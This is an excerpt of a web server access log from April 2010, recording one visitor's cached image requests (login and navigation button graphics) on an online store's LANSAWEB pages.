218.103.237.136 - - [16/Apr/2010:02:27:21 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:21 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:21 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:21 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:21 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
218.103.237.136 - - [16/Apr/2010:02:27:24 -0400] "GET /images/prev.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827501599639A000B7B7057+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Foxy/1; GTB6.4; Foxy/1)"
